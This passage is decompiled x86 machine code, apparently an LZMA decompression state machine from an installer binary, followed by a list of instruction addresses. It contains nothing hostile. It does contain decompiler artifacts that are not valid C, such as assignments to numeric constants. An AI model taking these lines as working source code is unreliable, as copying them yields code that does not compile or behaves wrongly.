                                                                                      											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                      											goto L76;
                                                                                      										case 0xa:
                                                                                      											L82:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												L84:
                                                                                      												__eax =  *(__ebp - 4);
                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                      												 *(__ebp - 0x84) = 0xb;
                                                                                      												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                      												goto L132;
                                                                                      											}
                                                                                      											L83:
                                                                                      											__eax =  *(__ebp - 0x28);
                                                                                      											goto L89;
                                                                                      										case 0xb:
                                                                                      											L85:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												__ecx =  *(__ebp - 0x24);
                                                                                      												__eax =  *(__ebp - 0x20);
                                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                      											} else {
                                                                                      												__eax =  *(__ebp - 0x24);
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x28);
                                                                                      											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                      											L89:
                                                                                      											__ecx =  *(__ebp - 0x2c);
                                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                                      											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                      											L90:
                                                                                      											__eax =  *(__ebp - 4);
                                                                                      											 *(__ebp - 0x80) = 0x15;
                                                                                      											__eax =  *(__ebp - 4) + 0xa68;
                                                                                      											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                      											goto L69;
                                                                                      										case 0xc:
                                                                                      											L99:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												L164:
                                                                                      												 *(__ebp - 0x88) = 0xc;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											L100:
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t334 = __ebp - 0x70;
                                                                                      											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t334;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											__eax =  *(__ebp - 0x2c);
                                                                                      											goto L101;
                                                                                      										case 0xd:
                                                                                      											L37:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												L159:
                                                                                      												 *(__ebp - 0x88) = 0xd;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											L38:
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t122 = __ebp - 0x70;
                                                                                      											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t122;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											L39:
                                                                                      											__eax =  *(__ebp - 0x40);
                                                                                      											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                      												goto L48;
                                                                                      											}
                                                                                      											L40:
                                                                                      											__eflags = __ebx - 0x100;
                                                                                      											if(__ebx >= 0x100) {
                                                                                      												goto L54;
                                                                                      											}
                                                                                      											L41:
                                                                                      											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                      											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                      											__ecx =  *(__ebp - 0x58);
                                                                                      											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                      											 *(__ebp - 0x48) = __eax;
                                                                                      											__eax = __eax + 1;
                                                                                      											__eax = __eax << 8;
                                                                                      											__eax = __eax + __ebx;
                                                                                      											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      											__ax =  *__esi;
                                                                                      											 *(__ebp - 0x54) = __esi;
                                                                                      											__edx = __ax & 0x0000ffff;
                                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      												__cx = __ax;
                                                                                      												 *(__ebp - 0x40) = 1;
                                                                                      												__cx = __ax >> 5;
                                                                                      												__eflags = __eax;
                                                                                      												__ebx = __ebx + __ebx + 1;
                                                                                      												 *__esi = __ax;
                                                                                      											} else {
                                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                                      												0x800 = 0x800 - __edx;
                                                                                      												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                      												__ebx = __ebx + __ebx;
                                                                                      												 *__esi = __cx;
                                                                                      											}
                                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      											 *(__ebp - 0x44) = __ebx;
                                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      												goto L39;
                                                                                      											} else {
                                                                                      												L45:
                                                                                      												goto L37;
                                                                                      											}
                                                                                      										case 0xe:
                                                                                      											L46:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												L160:
                                                                                      												 *(__ebp - 0x88) = 0xe;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											L47:
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t156 = __ebp - 0x70;
                                                                                      											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t156;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											while(1) {
                                                                                      												L48:
                                                                                      												__eflags = __ebx - 0x100;
                                                                                      												if(__ebx >= 0x100) {
                                                                                      													break;
                                                                                      												}
                                                                                      												L49:
                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                      												__edx = __ebx + __ebx;
                                                                                      												__ecx =  *(__ebp - 0x10);
                                                                                      												__esi = __edx + __eax;
                                                                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                      												__ax =  *__esi;
                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                      												__edi = __ax & 0x0000ffff;
                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      													__cx = __ax;
                                                                                      													_t170 = __edx + 1; // 0x1
                                                                                      													__ebx = _t170;
                                                                                      													__cx = __ax >> 5;
                                                                                      													__eflags = __eax;
                                                                                      													 *__esi = __ax;
                                                                                      												} else {
                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                      													0x800 = 0x800 - __edi;
                                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      													__ebx = __ebx + __ebx;
                                                                                      													 *__esi = __cx;
                                                                                      												}
                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      													continue;
                                                                                      												} else {
                                                                                      													L53:
                                                                                      													goto L46;
                                                                                      												}
                                                                                      											}
                                                                                      											L54:
                                                                                      											_t173 = __ebp - 0x34;
                                                                                      											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                      											__eflags =  *_t173;
                                                                                      											goto L55;
                                                                                      										case 0xf:
                                                                                      											L58:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												L161:
                                                                                      												 *(__ebp - 0x88) = 0xf;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											L59:
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t203 = __ebp - 0x70;
                                                                                      											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t203;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											L60:
                                                                                      											__eflags = __ebx - 0x100;
                                                                                      											if(__ebx >= 0x100) {
                                                                                      												L55:
                                                                                      												__al =  *(__ebp - 0x44);
                                                                                      												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                      												goto L56;
                                                                                      											}
                                                                                      											L61:
                                                                                      											__eax =  *(__ebp - 0x58);
                                                                                      											__edx = __ebx + __ebx;
                                                                                      											__ecx =  *(__ebp - 0x10);
                                                                                      											__esi = __edx + __eax;
                                                                                      											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                      											__ax =  *__esi;
                                                                                      											 *(__ebp - 0x54) = __esi;
                                                                                      											__edi = __ax & 0x0000ffff;
                                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      												__cx = __ax;
                                                                                      												_t217 = __edx + 1; // 0x1
                                                                                      												__ebx = _t217;
                                                                                      												__cx = __ax >> 5;
                                                                                      												__eflags = __eax;
                                                                                      												 *__esi = __ax;
                                                                                      											} else {
                                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                                      												0x800 = 0x800 - __edi;
                                                                                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      												__ebx = __ebx + __ebx;
                                                                                      												 *__esi = __cx;
                                                                                      											}
                                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      											 *(__ebp - 0x44) = __ebx;
                                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      												goto L60;
                                                                                      											} else {
                                                                                      												L65:
                                                                                      												goto L58;
                                                                                      											}
                                                                                      										case 0x10:
                                                                                      											L109:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												L165:
                                                                                      												 *(__ebp - 0x88) = 0x10;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											L110:
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t365 = __ebp - 0x70;
                                                                                      											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t365;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											goto L111;
                                                                                      										case 0x11:
                                                                                      											L69:
                                                                                      											__esi =  *(__ebp - 0x58);
                                                                                      											 *(__ebp - 0x84) = 0x12;
                                                                                      											goto L132;
                                                                                      										case 0x12:
                                                                                      											L128:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												L131:
                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                      												 *(__ebp - 0x84) = 0x13;
                                                                                      												__esi =  *(__ebp - 0x58) + 2;
                                                                                      												L132:
                                                                                      												 *(_t644 - 0x54) = _t642;
                                                                                      												goto L133;
                                                                                      											}
                                                                                      											L129:
                                                                                      											__eax =  *(__ebp - 0x4c);
                                                                                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                      											__ecx =  *(__ebp - 0x58);
                                                                                      											__eax =  *(__ebp - 0x4c) << 4;
                                                                                      											__eflags = __eax;
                                                                                      											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                      											goto L130;
                                                                                      										case 0x13:
                                                                                      											L141:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												L143:
                                                                                      												_t469 = __ebp - 0x58;
                                                                                      												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                      												__eflags =  *_t469;
                                                                                      												 *(__ebp - 0x30) = 0x10;
                                                                                      												 *(__ebp - 0x40) = 8;
                                                                                      												L144:
                                                                                      												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                                                                      												L145:
                                                                                      												 *(_t644 - 0x50) = 1;
                                                                                      												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                      												goto L149;
                                                                                      											}
                                                                                      											L142:
                                                                                      											__eax =  *(__ebp - 0x4c);
                                                                                      											__ecx =  *(__ebp - 0x58);
                                                                                      											__eax =  *(__ebp - 0x4c) << 4;
                                                                                      											 *(__ebp - 0x30) = 8;
                                                                                      											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                      											L130:
                                                                                      											 *(__ebp - 0x58) = __eax;
                                                                                      											 *(__ebp - 0x40) = 3;
                                                                                      											goto L144;
                                                                                      										case 0x14:
                                                                                      											L156:
                                                                                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                      											__eax =  *(__ebp - 0x80);
                                                                                      											while(1) {
                                                                                      												L140:
                                                                                      												 *(_t644 - 0x88) = _t537;
                                                                                      												goto L1;
                                                                                      											}
                                                                                      										case 0x15:
                                                                                      											L91:
                                                                                      											__eax = 0;
                                                                                      											__eflags =  *(__ebp - 0x38) - 7;
                                                                                      											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      											__al = __al & 0x000000fd;
                                                                                      											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                      											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                      											goto L120;
                                                                                      										case 0x16:
                                                                                      											goto L0;
                                                                                      										case 0x17:
                                                                                      											while(1) {
                                                                                      												L145:
                                                                                      												 *(_t644 - 0x50) = 1;
                                                                                      												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                      												goto L149;
                                                                                      											}
                                                                                      										case 0x18:
                                                                                      											goto L146;
                                                                                      										case 0x19:
                                                                                      											L94:
                                                                                      											__eflags = __ebx - 4;
                                                                                      											if(__ebx < 4) {
                                                                                      												L98:
                                                                                      												 *(__ebp - 0x2c) = __ebx;
                                                                                      												L119:
                                                                                      												_t393 = __ebp - 0x2c;
                                                                                      												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                      												__eflags =  *_t393;
                                                                                      												L120:
                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                      												__eflags = __eax;
                                                                                      												if(__eax == 0) {
                                                                                      													L166:
                                                                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												L121:
                                                                                      												__eflags = __eax -  *(__ebp - 0x60);
                                                                                      												if(__eax >  *(__ebp - 0x60)) {
                                                                                      													goto L171;
                                                                                      												}
                                                                                      												L122:
                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                      												__eax =  *(__ebp - 0x30);
                                                                                      												_t400 = __ebp - 0x60;
                                                                                      												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                      												__eflags =  *_t400;
                                                                                      												goto L123;
                                                                                      											}
                                                                                      											L95:
                                                                                      											__ecx = __ebx;
                                                                                      											__eax = __ebx;
                                                                                      											__ecx = __ebx >> 1;
                                                                                      											__eax = __ebx & 0x00000001;
                                                                                      											__ecx = (__ebx >> 1) - 1;
                                                                                      											__al = __al | 0x00000002;
                                                                                      											__eax = (__ebx & 0x00000001) << __cl;
                                                                                      											__eflags = __ebx - 0xe;
                                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                                      											if(__ebx >= 0xe) {
                                                                                      												L97:
                                                                                      												__ebx = 0;
                                                                                      												 *(__ebp - 0x48) = __ecx;
                                                                                      												L102:
                                                                                      												__eflags =  *(__ebp - 0x48);
                                                                                      												if( *(__ebp - 0x48) <= 0) {
                                                                                      													L107:
                                                                                      													__eax = __eax + __ebx;
                                                                                      													 *(__ebp - 0x40) = 4;
                                                                                      													 *(__ebp - 0x2c) = __eax;
                                                                                      													__eax =  *(__ebp - 4);
                                                                                      													__eax =  *(__ebp - 4) + 0x644;
                                                                                      													__eflags = __eax;
                                                                                      													L108:
                                                                                      													__ebx = 0;
                                                                                      													 *(__ebp - 0x58) = __eax;
                                                                                      													 *(__ebp - 0x50) = 1;
                                                                                      													 *(__ebp - 0x44) = 0;
                                                                                      													 *(__ebp - 0x48) = 0;
                                                                                      													L112:
                                                                                      													__eax =  *(__ebp - 0x40);
                                                                                      													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                      													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                      														L118:
                                                                                      														_t391 = __ebp - 0x2c;
                                                                                      														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                      														__eflags =  *_t391;
                                                                                      														goto L119;
                                                                                      													}
                                                                                      													L113:
                                                                                      													__eax =  *(__ebp - 0x50);
                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                      													__eax =  *(__ebp - 0x58);
                                                                                      													__esi = __edi + __eax;
                                                                                      													 *(__ebp - 0x54) = __esi;
                                                                                      													__ax =  *__esi;
                                                                                      													__ecx = __ax & 0x0000ffff;
                                                                                      													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                      													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                      													if( *(__ebp - 0xc) >= __edx) {
                                                                                      														__ecx = 0;
                                                                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                      														__ecx = 1;
                                                                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                      														__ebx = 1;
                                                                                      														__ecx =  *(__ebp - 0x48);
                                                                                      														__ebx = 1 << __cl;
                                                                                      														__ecx = 1 << __cl;
                                                                                      														__ebx =  *(__ebp - 0x44);
                                                                                      														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                      														__cx = __ax;
                                                                                      														__cx = __ax >> 5;
                                                                                      														__eax = __eax - __ecx;
                                                                                      														__edi = __edi + 1;
                                                                                      														__eflags = __edi;
                                                                                      														 *(__ebp - 0x44) = __ebx;
                                                                                      														 *__esi = __ax;
                                                                                      														 *(__ebp - 0x50) = __edi;
                                                                                      													} else {
                                                                                      														 *(__ebp - 0x10) = __edx;
                                                                                      														0x800 = 0x800 - __ecx;
                                                                                      														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                      														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                      														 *__esi = __dx;
                                                                                      													}
                                                                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      														L111:
                                                                                      														_t368 = __ebp - 0x48;
                                                                                      														 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                      														__eflags =  *_t368;
                                                                                      														goto L112;
                                                                                      													} else {
                                                                                      														L117:
                                                                                      														goto L109;
                                                                                      													}
                                                                                      												}
                                                                                      												L103:
                                                                                      												__ecx =  *(__ebp - 0xc);
                                                                                      												__ebx = __ebx + __ebx;
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                      												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                      												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                      													__ecx =  *(__ebp - 0x10);
                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                      													__ebx = __ebx | 0x00000001;
                                                                                      													__eflags = __ebx;
                                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                                      												}
                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      													L101:
                                                                                      													_t338 = __ebp - 0x48;
                                                                                      													 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                      													__eflags =  *_t338;
                                                                                      													goto L102;
                                                                                      												} else {
                                                                                      													L106:
                                                                                      													goto L99;
                                                                                      												}
                                                                                      											}
                                                                                      											L96:
                                                                                      											__edx =  *(__ebp - 4);
                                                                                      											__eax = __eax - __ebx;
                                                                                      											 *(__ebp - 0x40) = __ecx;
                                                                                      											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                      											goto L108;
                                                                                      										case 0x1a:
                                                                                      											L56:
                                                                                      											__eflags =  *(__ebp - 0x64);
                                                                                      											if( *(__ebp - 0x64) == 0) {
                                                                                      												L162:
                                                                                      												 *(__ebp - 0x88) = 0x1a;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											L57:
                                                                                      											__ecx =  *(__ebp - 0x68);
                                                                                      											__al =  *(__ebp - 0x5c);
                                                                                      											__edx =  *(__ebp - 8);
                                                                                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                      											 *( *(__ebp - 0x68)) = __al;
                                                                                      											__ecx =  *(__ebp - 0x14);
                                                                                      											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                      											__eax = __ecx + 1;
                                                                                      											__edx = 0;
                                                                                      											_t192 = __eax %  *(__ebp - 0x74);
                                                                                      											__eax = __eax /  *(__ebp - 0x74);
                                                                                      											__edx = _t192;
                                                                                      											goto L80;
                                                                                      										case 0x1b:
                                                                                      											L76:
                                                                                      											__eflags =  *(__ebp - 0x64);
                                                                                      											if( *(__ebp - 0x64) == 0) {
                                                                                      												L163:
                                                                                      												 *(__ebp - 0x88) = 0x1b;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											L77:
                                                                                      											__eax =  *(__ebp - 0x14);
                                                                                      											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      											__eflags = __eax -  *(__ebp - 0x74);
                                                                                      											if(__eax >=  *(__ebp - 0x74)) {
                                                                                      												__eax = __eax +  *(__ebp - 0x74);
                                                                                      												__eflags = __eax;
                                                                                      											}
                                                                                      											__edx =  *(__ebp - 8);
                                                                                      											__cl =  *(__eax + __edx);
                                                                                      											__eax =  *(__ebp - 0x14);
                                                                                      											 *(__ebp - 0x5c) = __cl;
                                                                                      											 *(__eax + __edx) = __cl;
                                                                                      											__eax = __eax + 1;
                                                                                      											__edx = 0;
                                                                                      											_t275 = __eax %  *(__ebp - 0x74);
                                                                                      											__eax = __eax /  *(__ebp - 0x74);
                                                                                      											__edx = _t275;
                                                                                      											__eax =  *(__ebp - 0x68);
                                                                                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      											_t284 = __ebp - 0x64;
                                                                                      											 *_t284 =  *(__ebp - 0x64) - 1;
                                                                                      											__eflags =  *_t284;
                                                                                      											 *( *(__ebp - 0x68)) = __cl;
                                                                                      											L80:
                                                                                      											 *(__ebp - 0x14) = __edx;
                                                                                      											goto L81;
                                                                                      										case 0x1c:
                                                                                      											while(1) {
                                                                                      												L123:
                                                                                      												__eflags =  *(__ebp - 0x64);
                                                                                      												if( *(__ebp - 0x64) == 0) {
                                                                                      													break;
                                                                                      												}
                                                                                      												L124:
                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                                      													__eflags = __eax;
                                                                                      												}
                                                                                      												__edx =  *(__ebp - 8);
                                                                                      												__cl =  *(__eax + __edx);
                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                      												 *(__ebp - 0x5c) = __cl;
                                                                                      												 *(__eax + __edx) = __cl;
                                                                                      												__eax = __eax + 1;
                                                                                      												__edx = 0;
                                                                                      												_t414 = __eax %  *(__ebp - 0x74);
                                                                                      												__eax = __eax /  *(__ebp - 0x74);
                                                                                      												__edx = _t414;
                                                                                      												__eax =  *(__ebp - 0x68);
                                                                                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                      												__eflags =  *(__ebp - 0x30);
                                                                                      												 *( *(__ebp - 0x68)) = __cl;
                                                                                      												 *(__ebp - 0x14) = _t414;
                                                                                      												if( *(__ebp - 0x30) > 0) {
                                                                                      													continue;
                                                                                      												} else {
                                                                                      													L127:
                                                                                      													L81:
                                                                                      													 *(__ebp - 0x88) = 2;
                                                                                      													goto L1;
                                                                                      												}
                                                                                      											}
                                                                                      											L167:
                                                                                      											 *(__ebp - 0x88) = 0x1c;
                                                                                      											goto L170;
                                                                                      									}
                                                                                      								}
                                                                                      								L171:
                                                                                      								_t539 = _t538 | 0xffffffff;
                                                                                      								goto L172;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      			}















                                                                                      0x00407194
                                                                                      0x00407194
                                                                                      0x00407194
                                                                                      0x00407194
                                                                                      0x0040719a
                                                                                      0x0040719e
                                                                                      0x004071a2
                                                                                      0x004071ac
                                                                                      0x004071ba
                                                                                      0x00407490
                                                                                      0x00407490
                                                                                      0x00407493
                                                                                      0x0040749a
                                                                                      0x004074c7
                                                                                      0x004074c7
                                                                                      0x004074cb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004074cd
                                                                                      0x004074d6
                                                                                      0x004074dc
                                                                                      0x004074df
                                                                                      0x004074e2
                                                                                      0x004074e5
                                                                                      0x004074e8
                                                                                      0x004074ee
                                                                                      0x00407507
                                                                                      0x0040750a
                                                                                      0x00407516
                                                                                      0x00407517
                                                                                      0x0040751a
                                                                                      0x004074f0
                                                                                      0x004074f0
                                                                                      0x004074ff
                                                                                      0x00407502
                                                                                      0x00407502
                                                                                      0x00407524
                                                                                      0x004074c4
                                                                                      0x004074c4
                                                                                      0x004074c4
                                                                                      0x004074c7
                                                                                      0x004074cb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407526
                                                                                      0x00407526
                                                                                      0x0040749f
                                                                                      0x004074a3
                                                                                      0x004075db
                                                                                      0x004075db
                                                                                      0x004075e5
                                                                                      0x004075ed
                                                                                      0x004075f4
                                                                                      0x004075f6
                                                                                      0x004075fd
                                                                                      0x00407601
                                                                                      0x00407601
                                                                                      0x004074a9
                                                                                      0x004074af
                                                                                      0x004074b6
                                                                                      0x004074be
                                                                                      0x004074be
